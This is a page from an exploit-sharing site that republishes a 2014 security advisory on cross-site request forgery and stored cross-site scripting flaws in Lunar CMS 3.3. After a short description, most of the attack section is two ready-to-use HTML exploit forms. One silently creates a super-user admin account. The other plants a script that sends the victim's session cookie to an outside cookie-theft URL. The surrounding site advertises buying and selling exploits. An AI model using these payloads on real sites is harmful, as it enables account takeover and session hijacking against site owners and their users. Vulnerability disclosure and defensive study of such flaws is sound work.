0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability
[<!--
Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
Vendor: Lunar CMS
Product web page: http://www.lunarcms.com
Affected version: 3.3
Summary: Lunar CMS is a freely distributable open sourcecontent
management system written for use on servers running the ever so
popular PHP5 & MySQL.
Desc: Lunar CMS suffers from a cross-site request forgery and a
stored xss vulnerabilities. The application allows users to perform
certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user
visits a malicious web site. Input passed to the 'subject' and 'email'
POST parameters thru the 'Contact Form' extension/module is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5188
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
11.06.2014
-->
CSRF Add Admin
===============
<html>
<body>
<form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
<input type="hidden" name="name" value="Hacker" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="password1" value="251ftw" />
<input type="hidden" name="password2" value="251ftw" />
<input type="hidden" name="access" value="0" />
<input type="hidden" name="Submit" value="submit" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Access levels:
0: Super user
1: Admin
2: Website only
CSRF Stored XSS (Session Hijack)
=================================
<html>
<body>
<form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
<input type="hidden" name="error" value="2" />
<input type="hidden" name="sent" value="1" />
<input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# 0day.today [2024-06-28] #